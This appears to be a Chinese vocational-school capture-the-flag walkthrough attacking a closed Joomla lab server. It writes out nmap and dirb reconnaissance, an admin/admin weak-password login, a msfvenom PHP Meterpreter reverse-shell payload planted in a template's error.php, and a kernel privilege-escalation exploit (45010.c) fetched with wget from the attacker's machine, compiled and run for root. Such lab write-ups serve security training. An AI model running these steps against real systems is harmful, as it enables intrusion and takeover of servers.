中职网络安全Web安全应用

任务环境说明:

√ 服务器场景:ubuntujoomla

√ 服务器场景操作系统:ubuntu(版本不详)(封闭靶机)

网络建设与运维-网络安全讨论715170200

1.获取PHP的版本号作为Flag值提交:(例如:5.2.14)

使用nmap扫描工具扫描服务版本

发现靶机开放了80端口,我们访问一下试一试

发现是一个播客,我们使用web网站目录爆破工具dirb扫描网站,试一试能不能爆破出网站后台

成功爆破出网站后台,我们登录进入

通常网站的用户名是admin,密码是admin或者123456

登录进去之后,在底下成功找到php的版本号

Flag:7.0.33

2.获取mysql数据库的版本号作为Flag值提交;(例如:5.0.22)

根据上一题,mysql的版本号也找到了

Flag:5.7.33

3.获取系统内核版本号作为Flag值提交;(例如:2.6.18)

如果要获取系统内核版本号,我们需要执行系统命令,获取内核版本号

通常获取执行命令的方式有上传一句话木马,或者使用msfvenom工具上传反弹木马

通过查看后台,发现可以上传反弹木马,然后执行系统命令

先在kali执行msfvenom工具,获取木马代码

msfvenom -p php/meterpreter/reverse_tcp lhost=本地ip lport=1234 -f raw -o shell.php

查看木马内容,将内容复制到error.php

保存好之后,就可以去使用漏洞模块反弹木马了

exploit/multi/handler

一定要设置好参数,接下来就要去访问一下error.php这个网页了,访问之后就获取到meterpreter命令行了

http://192.168.206.199/templates/beez3/error.php

获取命令行之后,执行uname -r命令查看内核版本

Flag:4.4.0

4.获取网站后台管理员admin用户的密码作为Flag提交;

我们登录网站后台使用的弱口令,admin用户的密码为:admin

Flag:admin

5.找到/root目录中txt文件,将文件内容作为Flag值提交。

我们在shell命令行中输入gcc,查看回显说明存在gcc漏洞

我们执行uname -a,查看内核版本和系统版本

新建一个窗口,搜索源码

searchsploit ubuntu 4.4.0

执行searchsploit -m linux/local/45010.c        #将文件下载下来

下载下来之后,上传到/var/www/html目录中,然后开启apache2服务

service apache2 start

在靶机shell中,将源码下载下来

wget http://192.168.206.189/45010.c

下载下来之后,执行gcc 45010.c -o exp

然后再执行exp

成功获取root权限

但是这一题中,/root目录没有flag,主要还是学习提权思路

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值